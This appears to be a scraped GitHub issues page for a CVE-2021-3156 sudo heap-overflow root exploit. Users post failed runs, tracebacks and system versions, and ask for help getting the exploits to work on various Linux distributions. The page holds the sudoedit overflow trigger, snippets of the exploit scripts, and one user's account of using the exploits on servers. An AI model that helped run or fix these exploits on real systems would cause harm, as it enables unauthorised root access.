AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Thanks.
Any help would be apreciated
Hi @worawit
i make python3 version of exploit_userspec.py via Python2 to 3 Conventer and try use it.
i get error "Cannot find cmnd size".
does this mean that this configuration is not usable or needs some work?
Traceback (most recent call last):
File "exploit_userspec3.py", line 737, in <module>
main()
File "exploit_userspec3.py", line 653, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec3.py", line 174, in find_cmnd_size
assert found, "Cannot find cmnd size"
AssertionError: Cannot find cmnd size
$ sudo --version
Sudo version 1.8.16
Sudoers policy plugin version 1.8.16
Sudoers file grammar version 45
Sudoers I/O plugin version 1.8.16
$ uname -r
4.4.0-amd64
$ ldd --version
ldd (Ubuntu GLIBC 2.23-0ubuntu10) 2.23
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Hi @worawit
Is exploitation possible on Debian 8 ?
$ sudo --version
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3
$ uname -r
3.16.0-4-amd64
$ sudoedit -s '01234567890123456789'
*** Error in `sudoedit': malloc(): memory corruption: 0x00005637fc4a7ea0 ***
Aborted
I tried the following exploits : () () ()
$ python exploit_nss_u14.py
Segmentation fault
$ python exploit_nss_u16.py
Segmentation fault
$ python exploit_nss_d9.py
Segmentation fault
$ python exploit_userspec.py
curr size: 0x1600
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005634c93fcbd0 ***
curr size: 0x1b00
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055bbd93f80d0 ***
curr size: 0x1d80
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055a8debe8350 ***
curr size: 0x1ec0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x0000562e47bd3490 ***
curr size: 0x1f60
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x0000561a4e9e9530 ***
curr size: 0x1fb0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005564bab37580 ***
curr size: 0x1fd0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055bcb07335a0 ***
curr size: 0x1fe0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055fd181b45b0 ***
curr size: 0x1ff0
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005587a03975c0 ***
has 2 holes. very big one is bad
curr size: 0xc00
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x00005651a540e1e0 ***
curr size: 0x1000
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055f198e1f5e0 ***
curr size: 0x1400
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x0000563b20a3d9e0 ***
curr size: 0x1800
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055b4f44c6de0 ***
curr size: 0x1c00
exit code: 6
*** Error in `sudoedit': malloc(): memory corruption: 0x000055d6e1c371e0 ***
Traceback (most recent call last):
File "exploit_userspec.py", line 736, in
main()
File "exploit_userspec.py", line 652, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec.py", line 173, in find_cmnd_size
assert found, "Cannot find cmnd size"
AssertionError: Cannot find cmnd size
Any help would be appreciated!
excuse me,I have learned a lot from your exploit methods。And I found it necessary that the user should be in /etc/sudoers when I use exploit_userspec.py,if the user is not in /etc/sudoers,is it possible to exploit?
python exploit_cent7_userspec.py
Traceback (most recent call last):
File "exploit_cent7_userspec.py", line 50, in
resource.setrlimit(resource.RLIMIT_STACK, (resource.RLIM_INFINITY, resource.RLIM_INFINITY))
ValueError: not allowed to raise maximum limit
anyone can help?
Is exploitation possible on Debian GNU/Linux 9.5 (stretch)
Sudo version : 1.8.19p1
Kernel : Linux localhost 4.9.0-8-amd64 #1 SMP Debian 4.9.110-3+deb9u6 (2018-10-08) x86_64 GNU/Linux
I tried all the exploit none of them worked !
Any help would be appreciated!
hi,worawit.
I've learned a lot about heap overflow from your project.But I have a new error during my VMs testing, the size parameter of cmnd function can not be obtained accurately all the time.
Here is the 'Error Message' below
[test@localhost tmp]$ python exploit_userspec.py
curr size: 0x1600
exit code: 11
curr size: 0x1100
exit code: 11
curr size: 0xe80
exit code: 11
curr size: 0xd40
exit code: 11
curr size: 0xca0
exit code: 11
curr size: 0xc50
exit code: 11
curr size: 0xc20
exit code: 11
curr size: 0xc10
exit code: 11
Traceback (most recent call last):
File "exploit_userspec.py", line 736, in <module>
main()
File "exploit_userspec.py", line 652, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec.py", line 154, in find_cmnd_size
assert size_min == 0x2000 - 0x10
AssertionError
And,here is the version below:
[test@localhost tmp]$ sudo -V
Sudo version 1.8.23
Sudoers policy plugin version 1.8.23
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.23
[test@localhost tmp]$ hostnamectl
Static hostname: localhost
Icon name: computer-vm
Chassis: vm
Machine ID: 71a7851c7f64482cad825974248cc902
Boot ID: d6b64d7f01684b8ca51f807d08079a03
Virtualization: vmware
Operating System: CentOS Linux 7 (Core)
CPE OS Name: cpe:/o:centos:centos:7
Kernel: Linux 3.10.0-957.21.3.el7.x86_64
[test@localhost tmp]$ python -V
Python 2.7.5
[test@localhost tmp]$ sysctl -a --pattern randomiz
kernel.randomize_va_space = 2
[test@localhost tmp]$ ldd --version
ldd (GNU libc) 2.17
Copyright (C) 2012 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
Also, I tried manually getting specific parameter values and specifying specific inputs(Some python code i've changed with local debugging)
exploit_userspec.py 0x2000 0
exploit_defaults_mailer.py 0x2000 0
The Error code still exists
Traceback (most recent call last):
File "exploit_userspec.py", line 736, in <module>
main()
File "exploit_userspec.py", line 652, in main
cmnd_size = find_cmnd_size()
File "exploit_userspec.py", line 154, in find_cmnd_size
assert size_min == 0x2000 - 0x10
AssertionError
Is exploitation possible on Debian 7.11(x86_64) sudo version 1.8.5p2
Kernel: 3.10.0
ldd version: 2.13-38+deb7u12
POCs lead to segfault and the last resort timestamp race is not effective
Any help would be appreciated!
Hi,
I was wondering if you have looked into exploitation strategies for systems based on Debian 10 cloud images, such as OpenStack. Many cloud providers use these images to deploy Debian instead of the standard downloads.
On these systems, the nscd
service is running by default, so I'm unable to use any of the nss-based exploits. However, exploit_timestamp_race
doesn't seem to work either; the exploit fails with this message, and the gg user is nonexistent:
...[truncated]
sudoedit: ././././././././././././a: command not found
Failed. can cleanup
sudoedit: ././././././././././././a: command not found
Failed. can cleanup
su: user gg does not exist
now can use "su - gg" with 'gg' password to become root
The version of glibc seems new enough that it's not tcache related, but I could be wrong. Here is some information about the system in question. I also created a VirtualBox VM here if you ever want to play around with the cloud image I'm testing on.
$ ldd --version
ldd (Debian GLIBC 2.28-10) 2.28
Copyright (C) 2018 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
$ uname -a
Linux debian10 4.19.0-14-cloud-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64 GNU/Linux
$ apt policy sudo
sudo:
Installed: 1.8.27-1+deb10u2
Candidate: 1.8.27-1+deb10u3
Version table:
1.8.27-1+deb10u3 500
500 http://deb.debian.org/debian buster/main amd64 Packages
500 http://security.debian.org/debian-security buster/updates/main amd64 Packages
*** 1.8.27-1+deb10u2 100
100 /var/lib/dpkg/status
$ apt policy libc6
libc6:
Installed: 2.28-10
Candidate: 2.28-10
Version table:
*** 2.28-10 500
500 http://deb.debian.org/debian buster/main amd64 Packages
100 /var/lib/dpkg/status
Hello Sleepya,
I've been using your successful exploits for long time and i noticed something that in some servers the created account "gg" is blocked after the exploit is implemented successfully using exploit_userspec.py
when I execute su gg , I get this msg
su gg
Password: gg
Account locked due to 5835 failed logins
su: Authentication failure
I think if we have the ability to make an old passwd file by changing the current user info inside the passwd file and then replace it , this problem will be solved, since we will not need to execute the su command because we are already inside the account. I tried to do so, but I could not find something like an old passwd file in the exploit_userspec.py.
Thank you
My system version is Centos7.9 and sudo version is 1.8.23
CentOS is not able to use the vulnerability?
In the exploit code: exploit_nss_u14.py or exploit_nss_u16.py, you wrote "the glibc with tcache" in the beginning comment. However, In the README.md, you wrote "For Linux distribution that glibc has no tcache support". Which one is typo? By the way, can you tell me the glibc version that you tested of Ubuntu 14.04 and 16.04? Thanks for your sharing.
#!/usr/bin/python
'''
Exploit for CVE-2021-3156 on Ubuntu 16.04 by sleepya
This exploit requires:
- glibc with tcache
For Linux distribution that glibc has no tcache support:
if a target is Debian 9, Ubuntu 16.04, or Ubuntu 14.04, try exploit_nss_xxx.py for specific version first
Hi!, I want to make exploit code in 32 bit environment.
There have been various attempts, but the most fundamental problem is that there is only one space(Unsorted bin) in the bins just before the overflow buffer is allocated.
Is there any way to increase this? (i want to use small bins, fast bins... but always Only unsorted bins remain.)
**
Hi @worawit
Use exploit: exploit_defaults_mailer.py
does this mean that this configuration is not usable or needs some work?
End output:
cmnd size: 0x1150
offset to defaults: 0x0
sudoedit: option `mail_always' does not take a value
sudoedit: you are not permitted to use the -C option
invalid offset. exit code: 256
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
$ uname -r
2.6.32-696.16.1.el6.x86_64
$ ldd --version
ldd (GNU libc) 2.12
Copyright (C) 2010 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
exploit_nss.py文件的187行
proc = subprocess.Popen(['ip', 'addr'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
Generally, ip addr cannot be used directly under low authority. It can be modified to /sbin/ip and modified to ['/sbin/ip','addr']
Hi @worawit
I tried the exploit code exploit_defaults_mailer.py on CentOS 6.10, and got some error messages as the following.
Cannot determine disble-root-mailer flag
curr size: 0x1600
exit code: 11
curr size: 0x1100
*** glibc detected *** sudoedit: malloc(): memory corruption: 0x00005654d9e3d630 ***
======= Backtrace: =========
/lib64/libc.so.6(+0x39ff475e5e)[0x2b2a32c83e5e]
/lib64/libc.so.6(+0x39ff47a41a)[0x2b2a32c8841a]
/lib64/libc.so.6(__libc_malloc+0x5c)[0x2b2a32c88b1c]
/usr/libexec/sudoers.so(+0x2f558)[0x2b2a331e2558]
/usr/libexec/sudoers.so(+0x29e52)[0x2b2a331dce52]
/usr/libexec/sudoers.so(+0x10d9d)[0x2b2a331c3d9d]
/usr/libexec/sudoers.so(+0xffda)[0x2b2a331c2fda]
/usr/libexec/sudoers.so(+0x124b0)[0x2b2a331c54b0]
/usr/libexec/sudoers.so(+0x13b4e)[0x2b2a331c6b4e]
sudoedit(+0xe8fc)[0x5654d966a8fc]
/lib64/libc.so.6(__libc_start_main+0x100)[0x2b2a32c2cd20]
sudoedit(+0x3ef9)[0x5654d965fef9]
======= Memory map: ========
2b2a321a0000-2b2a321c0000 r-xp 00000000 08:02 139429 /lib64/ld-2.12.so
2b2a321c0000-2b2a321c1000 rw-p 00000000 00:00 0
2b2a323c0000-2b2a323c1000 r--p 00020000 08:02 139429 /lib64/ld-2.12.so
2b2a323c1000-2b2a323c2000 rw-p 00021000 08:02 139429 /lib64/ld-2.12.so
2b2a323c2000-2b2a323c3000 rw-p 00000000 00:00 0
2b2a323c3000-2b2a323db000 r-xp 00000000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a323db000-2b2a325da000 ---p 00018000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a325da000-2b2a325dc000 r--p 00017000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a325dc000-2b2a325e7000 rw-p 00019000 08:02 139463 /lib64/libaudit.so.1.0.0
2b2a325e7000-2b2a32604000 r-xp 00000000 08:02 139436 /lib64/libselinux.so.1
2b2a32604000-2b2a32803000 ---p 0001d000 08:02 139436 /lib64/libselinux.so.1
2b2a32803000-2b2a32804000 r--p 0001c000 08:02 139436 /lib64/libselinux.so.1
2b2a32804000-2b2a32805000 rw-p 0001d000 08:02 139436 /lib64/libselinux.so.1
2b2a32805000-2b2a32807000 rw-p 00000000 00:00 0
2b2a32807000-2b2a32809000 r-xp 00000000 08:02 130443 /lib64/libutil-2.12.so
2b2a32809000-2b2a32a08000 ---p 00002000 08:02 130443 /lib64/libutil-2.12.so
2b2a32a08000-2b2a32a09000 r--p 00001000 08:02 130443 /lib64/libutil-2.12.so
2b2a32a09000-2b2a32a0a000 rw-p 00002000 08:02 130443 /lib64/libutil-2.12.so
2b2a32a0a000-2b2a32a0c000 r-xp 00000000 08:02 139435 /lib64/libdl-2.12.so
2b2a32a0c000-2b2a32c0c000 ---p 00002000 08:02 139435 /lib64/libdl-2.12.so
2b2a32c0c000-2b2a32c0d000 r--p 00002000 08:02 139435 /lib64/libdl-2.12.so
2b2a32c0d000-2b2a32c0e000 rw-p 00003000 08:02 139435 /lib64/libdl-2.12.so
2b2a32c0e000-2b2a32d99000 r-xp 00000000 08:02 139430 /lib64/libc-2.12.so
2b2a32d99000-2b2a32f98000 ---p 0018b000 08:02 139430 /lib64/libc-2.12.so
2b2a32f98000-2b2a32f9c000 r--p 0018a000 08:02 139430 /lib64/libc-2.12.so
2b2a32f9c000-2b2a32f9e000 rw-p 0018e000 08:02 139430 /lib64/libc-2.12.so
2b2a32f9e000-2b2a32fa5000 rw-p 00000000 00:00 0
2b2a32fa5000-2b2a32fb2000 r-xp 00000000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a32fb2000-2b2a331b1000 ---p 0000d000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a331b1000-2b2a331b2000 r--p 0000c000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a331b2000-2b2a331b3000 rw-p 0000d000 08:02 130339 /lib64/libnss_files-2.12.so
2b2a331b3000-2b2a331f9000 r-xp 00000000 08:02 678288 /usr/libexec/sudoers.so
2b2a331f9000-2b2a333f8000 ---p 00046000 08:02 678288 /usr/libexec/sudoers.so
2b2a333f8000-2b2a333f9000 r--p 00045000 08:02 678288 /usr/libexec/sudoers.so
2b2a333f9000-2b2a333fb000 rw-p 00046000 08:02 678288 /usr/libexec/sudoers.so
2b2a333fb000-2b2a33401000 rw-p 00000000 00:00 0
2b2a3340d000-2b2a33419000 r-xp 00000000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a33419000-2b2a33619000 ---p 0000c000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a33619000-2b2a3361a000 r--p 0000c000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a3361a000-2b2a3361b000 rw-p 0000d000 08:02 139464 /lib64/libpam.so.0.82.2
2b2a3361b000-2b2a33669000 r-xp 00000000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a33669000-2b2a33868000 ---p 0004e000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a33868000-2b2a3386a000 r--p 0004d000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a3386a000-2b2a3386c000 rw-p 0004f000 08:02 130729 /lib64/libldap-2.4.so.2.10.3
2b2a3386c000-2b2a33881000 r-xp 00000000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33881000-2b2a33a80000 ---p 00015000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33a80000-2b2a33a81000 r--p 00014000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33a81000-2b2a33a82000 rw-p 00015000 08:02 139437 /lib64/libz.so.1.2.3
2b2a33a82000-2b2a33a89000 r-xp 00000000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33a89000-2b2a33c89000 ---p 00007000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33c89000-2b2a33c8a000 r--p 00007000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33c8a000-2b2a33c8b000 rw-p 00008000 08:02 130312 /lib64/libcrypt-2.12.so
2b2a33c8b000-2b2a33cb9000 rw-p 00000000 00:00 0
2b2a33cb9000-2b2a33cc7000 r-xp 00000000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33cc7000-2b2a33ec6000 ---p 0000e000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33ec6000-2b2a33ec7000 r--p 0000d000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33ec7000-2b2a33ec8000 rw-p 0000e000 08:02 139470 /lib64/liblber-2.4.so.2.10.3
2b2a33ec8000-2b2a33ede000 r-xp 00000000 08:02 139451 /lib64/libresolv-2.12.so
2b2a33ede000-2b2a340de000 ---p 00016000 08:02 139451 /lib64/libresolv-2.12.so
2b2a340de000-2b2a340df000 r--p 00016000 08:02 139451 /lib64/libresolv-2.12.so
2b2a340df000-2b2a340e0000 rw-p 00017000 08:02 139451 /lib64/libresolv-2.12.so
2b2a340e0000-2b2a340e2000 rw-p 00000000 00:00 0
2b2a340e2000-2b2a340fb000 r-xp 00000000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a340fb000-2b2a342fa000 ---p 00019000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a342fa000-2b2a342fb000 r--p 00018000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a342fb000-2b2a342fc000 rw-p 00019000 08:02 683479 /usr/lib64/libsasl2.so.2.0.23
2b2a342fc000-2b2a34350000 r-xp 00000000 08:02 683482 /usr/lib64/libssl3.so
2b2a34350000-2b2a3454f000 ---p 00054000 08:02 683482 /usr/lib64/libssl3.so
exit code: 6
curr size: 0x1380
exit code: 11
curr size: 0x1240
exit code: 11
curr size: 0x11a0
exit code: 11
curr size: 0x1150
exit code: 256
sudoedit: no askpass program specified, try setting SUDO_ASKPASS
curr size: 0x1160
exit code: 11
found cmnd size: 0x1150
cmnd size: 0x1150
offset to defaults: 0x0
invalid offset. exit code: 256
$ sudo -V
Sudo version 1.8.6p3
Sudoers policy plugin version 1.8.6p3
Sudoers file grammar version 42
Sudoers I/O plugin version 1.8.6p3
$ ldd --version
ldd (GNU libc) 2.12
$ uname -r
2.6.32-754.el6.x86_64
After running the exploit, the folder 'gg' was added in /tmp folder.
drwxrwxrwt. 19 root root 4096 Jul 20 19:36 .
-rwxr-xr-x. 1 user user 97 Jul 20 19:36 gg
Also, CentOS 6.10 was installed on VMware.
Thanks,
Any ideas would be appreciated.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.